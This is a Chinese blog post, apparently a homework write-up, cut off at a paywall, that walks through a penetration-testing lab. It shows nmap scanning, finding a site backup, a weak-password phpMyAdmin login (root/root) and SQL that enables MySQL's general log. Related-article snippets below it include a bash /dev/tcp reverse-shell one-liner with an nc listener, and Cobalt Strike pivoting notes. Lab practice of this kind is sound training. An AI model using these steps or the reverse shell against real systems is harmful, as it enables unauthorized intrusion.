第二周渗透测试靶场实践

最新推荐文章于 2023-06-03 18:14:21 发布
最新推荐文章于 2023-06-03 18:14:21 发布
阅读量362 收藏 2
点赞数
分类专栏: 作业 文章标签: 数据库 mysql jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51777190/article/details/120729586
版权

第二周渗透测试靶场实践

信息收集

扫描端口

  • 靶场地址:10.203.87.175
  • nmap -sS -sV -A 10.203.87.175

请添加图片描述

  • 开了80端口,浏览器打开

请添加图片描述

  • 发现备份文件,点击备份文件,解压

请添加图片描述

  • 打开每个文件看看

请添加图片描述

  • 有可能是网站中刚打开的YXCMS,回到网站,点击XYCMS

请添加图片描述

漏洞利用

phpMyadmin

请添加图片描述

  • 通过弱口令root/root进入

请添加图片描述

  • select @@basedir; //查询路径

请添加图片描述

  • show global variables like ‘%general%’; //查看general*值

请添加图片描述

  • general_log为OFF
  • set global general_log=on; //开启日志

请添加图片描述- 再次看一遍日志

最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web安全渗透测试.7z
04-08
9. **靶场源码** - 仿真Web应用,用于练习和测试渗透测试技术,提供安全漏洞的环境。 10. **轻量WEB指纹识别** - 可能是指一款轻便的Web服务器指纹识别工具,用于识别目标Web服务器的类型和版本,这在规划渗透测试...
二号靶场.zip
最新发布
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
厉害了,上次我见过这么厉害的安全测试实战还是上次
Androidyuexia的博客
12-08 828
01概念介绍 1.1 xss XSS 攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是 JavaScript,但实际上也可以包括 Java、 VBScript、ActiveX、 Flash 或者甚至是普通的 HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和 cookie 等各种内容。 参考资料:百度百科 1.2 pr 提权 PR 提权利用 Win
反弹木马——本质上就是一个开80端口的CS程序,伪造自己在浏览网页
djph26741的博客
10-11 433
反弹端口型木马分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口,为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端...
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-28 3193
利用CrossC2插件工具,将Linux系统的shell反弹回Cobalt_Strike,方便后续的内网渗透。用CrossC2来反弹Linux主机shell给内网渗透工具Cobalt Strike(cs)。
ssh反向连接和简单实现 转http://www.broncho.cn/forum/viewtopic.php?p=1116
fjfdszj的专栏
12-22 2783
ssh反向连接和简单实现<br />由 lyb 于 2008-11-23 13:40 1<br /> 知识浅薄,欢迎指正。 LYB 2008.11.23<br /><br />最近想在家里登录公司的机器查看代码,期间碰到了一些问题,因为公司里的机器是没有对外IP的,而且请网管<br />做个端口映射也比较麻烦,所以在家里不能直接连接到公司的机器上。在网上搜索了一下,找到了ssh反向连接这<br />个解决方法,成功解决了不能直接连接的问题,并对反向连接的实现感兴趣,按照自己的想法,写了一个简单的示<br
反弹shell方法
s0mor
08-16 677
Linux: hacker: 192.168.188.63 (kali) 目标: 192.168.72.130 (ubuntu) kali: 监听指定端口: nc -lvp 1234 ubuntu: 反弹shell 方法一 bash: bash -i >& /dev/tcp/192.168.188.63/1234 0>&1 方法二 python: ...
红队隧道应用篇之CS正反向连接突破内网(二)
xf555er的博客
12-08 1414
在CS客户端新建一个TCP协议的监听, 监听端口为创建无状态木马(Windows Executable(S)), 选择上述建立的TCP监听器, 随后将无状态木马放到不出网的内网主机中去运行, 运行后内网主机就会监听本机的4444端口在web服务器的beacon命令行输入: , 来正向连接内网主机, 随后内网主机在CS上线若内网主机上部署了防火墙, 那么正向连接很可能会被防火墙拦截掉, 为了解决这一问题可以采用反向连接反向连接可以突破防护墙的拦截, 这是因为这是从内网主机反向连接出站的在Web服务器新建一
DVWA靶场,集成了owasp top 10漏洞
03-28
通过DVWA靶场的学习,你可以深入了解这些漏洞,提升自己的渗透测试技能,并了解如何为实际环境中的Web应用程序构建更强大的安全防护。同时,对于开发人员来说,这是一个绝佳的平台,可以用来增强对安全编码的理解,...
CSRF的脚本,可以做测试使用.zip
05-28
5. 渗透测试的重要性: 通过像"CSRF的脚本,可以做测试使用.zip"这样的资源,安全从业者可以模拟攻击,找出系统中的CSRF漏洞,从而提前修复,提高系统的安全性。同时,这也提醒我们,进行任何安全测试都应在合法的...
XYCMS搬家公司建站系统 v2.4
12-07
XYCMS搬家公司建站系统模板 系统栏目功能介绍 公司信息管理:包括基本信息管理,添加,在线咨询信息管理,在线回复咨询信息 新闻资讯管理:管理新闻信息内容,管理相关分类,添加或者删除 服务项目管理:对服务项目,领域进行管理,发布信息,管理信息。 网页
WebShell文件上传漏洞分析溯源(第3题)
02-22
打开测试靶场上传页面,上传已经命名的 8.jpg 文件。 ### 步骤 3:拦截上传代码 使用 Burp 拦截工具拦截上传的代码,并修改文件名为 8.php。 ### 步骤 4:查看返回路径 返回路径查看照片是否正常显示。如果照片...
第19篇:关于近期cs服务端被反打的原因分析
ABC_123的博客
08-08 1755
Part1 前言最近几天,不少朋友的cs服务端被反打了,相信很多网友都知道了,大家也都在讨论,各种各样说法都有。具体事件描述如下:部分网友的cs服务端被不明攻击者拿下权限,之后攻击者将cs上的shell全部通过云函数的方式反弹到自己的cs上,之后将原有cs端的shell权限清空,在cs控制台留下一句话“CS RCE全版本通杀 Please v Me 获取详情”等之类的...
红蓝对抗之隧道技术第一篇(内网穿透、端口映射&端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)
Love&Share
12-19 2567
在进行内网渗透时,由于外网主机无法直接连接内网主机,所以需要使用隧道技术来搭建连接通道访问内网主机即内网穿透,先来了解下几种转发技术
内网安全:Cobalt Strike 工具 渗透多层内网主机.(正向 || 反向)
网络安全领域___专研者.
06-03 2122
Cobalt Strike是一款以metasploit为基础的GUI的框架式渗透工具,又被业界人称为CS。拥有多种协议主机上线方式,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等.
windows知道端口,怎么确定是什么程序在调用
weixin_45548465的博客
06-24 605
windows对应链接具体是什么程序在占用
Linux中怎么查看靶机文件里的内容,记一次lampiao靶机渗透
weixin_33049919的博客
05-07 647
最近笔者整理各类靶机,发现部分靶机没有做过记录,因此借此对lampiao靶机渗透思路进行一次总结,以此完善笔记。一、导入Lampiao靶机后选择NET模式开启kali也选择NET模式Kali的ip为 192.168.56.129扫描C段寻找靶机地址二、发现靶机ip为 192.168.56.130开启了22,80端口,访问80端口三、没有可利用的信息,通过NMAP扫描主机开放的所有端口四、访问189...
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2426
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shell。Linux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf。
内网安全-域横向CS&MSF联动及应急响应初识
xhscxj的博客
03-25 4047
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上cs和msf 将cs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了各种漏洞和安全问题供你尝试攻击和修复。 DVWA是一个非常受欢迎的靶场CMS,它包含了多个安全漏洞,例如SQL注入、跨站脚本攻击(XSS)和文件上传漏洞等。OWASP Juice Shop是一个现代化的Web应用程序,旨在模拟真实世界中常见的安全问题。WebGoat是另一个非常受欢迎的靶场CMS,它提供了一系列挑战和实验,帮助你学习各种Web应用程序漏洞。 通过使用这些靶场CMS,你可以积极主动地学习和测试不同类型的Web应用程序漏洞,提高你的渗透测试技能。记得在使用靶场CMS进行渗透测试时,要遵守法律和道德规范,并且只在合法的环境中进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值